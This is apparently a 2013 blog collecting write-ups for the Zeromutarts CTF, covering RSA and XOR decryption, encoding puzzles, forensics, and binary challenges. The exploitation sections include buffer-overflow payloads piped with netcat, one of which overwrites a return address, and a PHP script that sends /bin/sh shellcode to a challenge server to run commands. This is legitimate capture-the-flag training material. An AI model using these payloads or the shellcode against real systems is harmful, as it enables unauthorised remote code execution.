zondag 17 november 2013

rivest-shamir-adleman - Zeromutarts CTF

rivest-shamir-adleman: 250 points

This one is important, we have no clue how to decrypt the secret message! Can you help us?
rivest.py (http://zeromutarts.de/res/rivest.py)
rivest.txt (http://zeromutarts.de/res/rivest.txt)

Again an RSA challenge, but this time we have to figure out d in order to decrypt the message.
We first have to figure out what the values for p and q are.
We know that n = p*q and that p and q are two primes.

wolframalpha.com is able to calculate p and q for us: http://www.wolframalpha.com/input/?i=factor%2880646413%29
p = 8059
q = 10007
m = (p - 1) * (q - 1)

After borrowing some code from: http://teampython.wordpress.com/2013/01/16/rsa-algorithm/:
import sys

def get_d(e, m):
    """Takes encoding number, 'e' and the value for 'm' (p-1) * (q-1).
    Returns a decoding number."""
    x = lasty = 0
    lastx = y = 1
    while m != 0:
        q = e // m
        e, m = m, e % m
        x, lastx = lastx - q*x, x
        y, lasty = lasty - q*y, y
    return lastx
n = 80646413
e = 5

p = 8059
q = 10007

m = (p - 1) * (q - 1)
d = get_d(e, m)
while d < 0:
         d += m

f = open('rivest.txt', 'r')
str = ''
for line in f:
    line = int(line.strip())
    c = pow(line, d, n)
    str += chr(c)

print str
$ python rivest.py

The magic of rsa - Zeromutarts CTF

the magic of rsa: 100 points

You were able to hear some whispering on the last crypto party! *whisper* d is 35181901. Keep it secret or we are doomed!
rsa.py (http://zeromutarts.de/res/rsa.py)
rsa.txt (http://zeromutarts.de/res/rsa.txt)

According to the RSA specification (http://tools.ietf.org/html/rfc3447#section-5.1.1) we can encrypt and decrypt messages in the following way:

(c = cypher and m = message)

c = RSAEP ((n, e), m)
Or: c = m^e mod n.
Or: c = pow(m, e, n) in python

And for decryption:
m = RSADP ((n, d), c).
Or: m = c^d mod n.
Or: m = pow(c, d, n) in python

We have all the components needed for successful decryption, so we can assemble a short python script to decipher the encrypted message.
import sys

n = 65354147
e = 13
d = 35181901

f = open('rsa.txt', 'r')
str = ''
for line in f:
    line = int(line.strip())
    c = pow(line, d, n)
    str += chr(c)

print str
$ python rsa.py

donderdag 14 november 2013

Encoding and Crypto challenges - Zeromutarts CTF

caesar's last wish: 100 points

Caesar left a message for me. Can you decrypt it?

zh zrxog qhyhu pdnh lw wkdw hdvb.. rxu hqfubswlrq lv rqh vwhs dkhdg!livi mw er mrgvihmfpi xlsyklx sj geiwevr alex ai amwl, ai viehmpc fipmizi, erh alex ai syvwipziw xlmro, ai mqekmri sxlivw xlmro epws. ai amwl xli jpek mw jpek{xairxc_xlvii_wxefw_evi_aec_xss_qerc}

The caesar shift used is ROT4.
After ROT4 decoding we get the following message:
vd vntkc mdudq lzjd hs sgzs dzrx.. ntq dmbqxoshnm hr nmd rsdo zgdzc!here is an incredible thought of caesarn what we wish, we readily believe, and what we ourselves think, we imagine others think also. we wish the flag is flag{twenty_three_stabs_are_way_too_many}

encodings: 100 points

I believe a flag is hidden in this encoding. Can you find it?:

The order to obtain the flag:
  • Base64 decode the string
  • Reverse the decoded string
  • Rot13 shift the reverse string
$dataEnc = "TWF5YmUgeW91IHNob3VsZCB0aGluayB0aGUgb3RoZXIgd2F5OiBbKSJ9cmdoZW9faGdfZ3J7dG55cyIgOnJmbnBlcmpieSBhdiB0bnlzIHJ1ZyBnYnQgaGJMIC9iXCAhcnB2QSggOj90aSB0ZmlocyBuZXZlIHVveSBuYWMgLHJhZW4gc2kgZG5FIG5BXQ==";

// Base64 decode
$data = base64_decode($dataEnc);

// Reverse
$data = substr($data, 40);
$data = substr($data, 0, -1);
$data = strrev($data);

// ROT13 shift
$data = substr($data, 41);
$data = str_rot13($data);

print $data . "\n";

$ php decode.php
Nice! \o/ You got the flag in lowercase: "flag{et_tu_brute}"

txt_securer: 100 points

Intercepted some messages encrypted using this high-tech algorithm. (http://zeromutarts.de/res/txt_securer.py)

This message is not important, so I send it twice encrypted and plain.




The 'high-tech algorithm' is XOR, a quite simple algorithm.
The key is a random password of 16 bytes generated with urandom, so it can't be brute forced.
But a different way of decrypting the messages exists.
If we swap the encrypted message with the key, the key will roll out in plain text.

import base64
import os
def xor(data, key):
    return "".join(map(lambda (x,y): chr(ord(x) ^ ord(y)), zip(data, key*(len(data)/len(key)+1))))

def decrypt(data, key):
    return xor(base64.b64decode(data), key)

msg1 = "This message is not important, so I send it twice encrypted and plain."
msg1_enc = "XOvjumbdDj+Ny3Dz/dicO2bs/ukv3RsjjN52+Kmdz2hno8PpNdUFKN7DY7apxoZ4baPvpyXCEjyKz3O2vN+LO3jv66Aong=="
key = decrypt(msg1_enc, msg1)[0:16]

msg2_enc = "Ruz96TLYDmyXx2f5r8WOdXyj56w1wworm4pg/6nZz29g5qqvKtEMdt6Icfq81pR4ae3VsCnFNC6bxn7zq9SwY2fx1bk03x0lms9kya3UnX1t4P6WNdUIOYzDY+/izM01"
print decrypt(msg2_enc, key)

msg3_enc = "QOb4rGbZGGyKwn7kuZGCfnvw664jnEs4kYp0+bPXmmhto+W8NJAEPJHEcvipnc95ffeqoSOQCC2QjWO2r9SOfyj34qA1kAYpjdl28biRjnVx9OuwaA=="
print decrypt(msg3_enc, key)

$ python txt_securer.py
Now the important message with the flag: "flag{can_you_believe_xor_provides_perfect_security?}".
Here is third message, to confuse our oponent, but he can't read this message anyway.

woensdag 13 november 2013

'Exploitation' challenges - Zeromutarts CTF

overflow: 100 points
Smashing the Stack for Fun and Profit:
source (http://www.zeromutarts.de/res/overflow_redacted.c)
binary (x86) (http://zeromutarts.de/res/overflow_redacted)

To solve the challenge, connect to:
telnet spacenet.stratum0.net 5555
(or netcat on Linux)

After our 1024 byte buffer we get the variable 'data' with a value of 0xdeadbeef
So, if our input is 1028 bytes we could overwrite the variable 'data' containing 0xdeadbeef and the program should return the flag.

$ perl -e 'print "A"x1028' | nc spacenet.stratum0.net 5555
What's your name? Hi AAAAAA ... snip ...
How did this happen? Here is your flag: "flag{the_90s_called_they_want_their_overflow_back}"

real overflow: 250 points

Smashing the stack for fun and profit, the next level:
source (http://zeromutarts.de/res/real_overflow_redacted.c)
binary (x86) (http://zeromutarts.de/res/real_overflow)

To solve the challenge, connect to:
nc spacenet.stratum0.net 4444 (or 4445)
(this will probably not work with telnet)

Based on the source we can conclude that no size limitation of data put into the buffer is present.
So we can overflow our 1024 byte buffer and execute our own code.
But no shellcode has to be executed.
It is enough to overwrite eip with the address of the printf_flag() function.
This address is provided when we connect to the service.

When we feed the application 1040 A's (generated with perl -e 'print "A"x1040') we get a crash in 0x41414141.

user@ubuntu:~/real-overflow$ gdb -q ./real_overflow
Reading symbols from ~/real_overflow...(no debugging symbols found)...done.
(gdb) r
Starting program: ~/real_overflow
Oh you again, did you know that the address of print_flag is at 0x804847d?
Can you tell me your name again?  ... 1040x A ...
Hi AAAAAAAAA ... snip ...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

This also demonstrates the leakage of the address of print_flag()
So we only have to connect to the challenge server and send: [1036x A + address of print_flag()]

$ perl -e 'print "A"x1036 . "\x9c\x84\x04\x08"' | nc spacenet.stratum0.net 4444
Oh you again, did you know that the address of print_flag is at 0x804849c?
Can you tell me your name again? Hi AAAAAAAA ... snip ...
Well done! here is your flag: flag{were_running_out_of_flags}

Miscellaneous challenges - Zeromutarts CTF

antonin: 100 points

I got a letter from my friend Antonín. However, it's all Czech to me, maybe you can read it.
link (http://zeromutarts.de/res/antonin.txt)

The name Antonin refers to Antonin Dvořák.
And even though the Dvořák keyboard was not one of his creations, the Dvořák keyboard is the direction we will have to head to.

Eventually if we replace all the characters based on the German Dvořák keyboard by characters based on the German QWERTZ keyboard we get the flag.

Dear friend,
I just want to let you know the secret for the encrypted scroll I sent you. Use it wisely and do not give it to anyone.
The secret is. flag{feel_so_bohemian_like_you}

chbs: 100 points


After Googling for "Tr0ub4dor&3" we find the (infamous) comic concerning password strength on xkcd: http://xkcd.com/936/

flag: flag{correct_horse_battery_staple}

pseudocode: 100 points

Found some old pseudocode, but I never implemented it. (http://zeromutarts.de/res/pseudocode)

We get some strange pseudocode, what looks like a combination of php and python. After porting the code from 'pseudocode' to python we get the flag.
import hashlib

for x in range(21, 29):
    if x % 22 == 1:
        hash = hashlib.md5(str(x)).hexdigest()
        print("flag{" + hash[29] + hash[6] + hash[6] + hash[14] + "}")
 $ python ./code.py

Forensic challenges and puzzles - Zeromutarts CTF

hidden: 100 points

We are provided with an image. (http://zeromutarts.de/res/hidden.jpg)

The flag is 'hidden' in the comment section of the image and can be extracted with the 'file' command or any other tool you like.

$ file hidden.jpg
hidden.jpg: JPEG image data, JFIF standard 1.01, comment: "flag{oh_shit_you_must_be_the_chosen_one}"

noise: 100 points

One is not like the others...
noise.html (http://zeromutarts.de/res/noise.html)

At first sight nothing seems to be different.
No abnormalities seem to exist, but when we look at the html source code itself, we can see an interesting line:
<a style="display:none;">flag{the_user_checks_the_sourcecode}</a>

puzzle: 100 points

I hope this doesn't leave you puzzled. (http://zeromutarts.de/res/puzzle.zip)

A zip file containing 16 parts of a QR code is provided.
After reassembling and scanning the QR code, we get the correct flag.


xoxo :100 points

My love,
I am under constant observation from my parents, so I cannot speak clear. Here are two random images. You know what to do.

message1.png (http://zeromutarts.de/res/xoxo-message1.png)
message2.png (http://zeromutarts.de/res/xoxo-message2.png)

We are provided with two pictures, which seem to contain random data.
But when we overlay the two images and use a transparency of 50% on the upper layer we can see the flag.


maandag 11 november 2013

Binary challenges - Zeromutarts CTF

hardcoded:100 points

Can you crack the password?:
linux (http://zeromutarts.de/res/hardcoded)
windows (http://zeromutarts.de/res/hardcoded.exe)
source (http://zeromutarts.de/res/hardcoded_redacted.c)

Based on the source of the application the password is hardcoded and should give us the flag.
With the 'strings' command the password can be extracted.

$ strings hardcoded

... snip ...

That was the wrong password.
Congratulations! Your flag is: "%s"

$ ./hardcoded
Password: SuperSecur3password!1

Congratulations! Your flag is: "flag{hardcoded_passwords_are_hardcoded}"

execute: 200 points

This program (x86 Linux) will execute everything you give him, can you find the flag?
nc spacenet.stratum0.net 3333
(this will probably not work with telnet)

Like the description mentioned, this application will execute everything, but not just as a bash command. We will have to provide shellcode.

For this case I will use the shellcode written by Aleph One in "Smashing the stack for profit and fun", but you could use any shellcode that executes a shell like /bin/sh.

The code will speak for itself. :)
$shellcode = "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh\n";
$fp = fsockopen('spacenet.stratum0.net', 3333, $errno, $errstr);

echo "command: ";
$command = fgets(STDIN);
echo "\r\n";
if (!$fp) {
    echo "ERROR: $errno - $errstr\n";
} else {
    fwrite($fp, $shellcode);
    fwrite($fp, $command);
    echo fread($fp, 256) . "\r\n";

$ php exploit.php
command: ls


$ php exploit.php
command: cat flag.txt